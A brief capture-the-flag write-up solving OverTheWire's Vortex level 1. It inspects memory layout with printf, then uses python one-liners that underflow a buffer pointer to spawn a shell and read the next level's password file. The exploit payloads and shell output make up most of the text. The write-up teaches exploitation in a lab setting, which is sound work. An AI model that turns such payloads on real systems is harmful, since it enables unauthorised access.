This one is still a warming up level. Try to rebuild the code with some new printf statements, just to gather information of the memory layout:
... printf("begin address of buf:\t%x\n", (unsigned int)buf); printf("end address of buf:\t%x\n",((unsigned int)buf + sizeof(buf))); printf("address of ptr:\t\t%x\n",&ptr); ...
As you can see
begin address of buf: bffff490 end address of buf: bffff690 address of ptr: bffff48c
ptr is allocated before the buffer. So we must “underflow” the buffer. If you check the code carefully, you can see, that we should move the pointer back (“\\”), to point at “itself”, write the most significant byte (“\xca”), and then trigger the shell execution with any character (except “\n”,”\\”):
python -c 'print "\\"*0x101+"\xcaX"' |/vortex/level1 sh-3.2$ exit
A shell is spawned, but it exits immediately. I’ve tried to add some commands, after the spawn is triggered, but nothing happend. After some experiments, I figured out, if I provide a huge string, and the commands after it, we succeed:
python -c 'print "\\"*0x101+"\xca!\n"+"A"*4000+"\nwhoami\ncat /etc/vortex_pass/vortex2"' |/vortex/level1. sh-3.2$ sh: AAAAAAA [...] AAAAAAA: command not found sh-3.2$ vortex2 sh-3.2$ ******** sh-3.2$ exit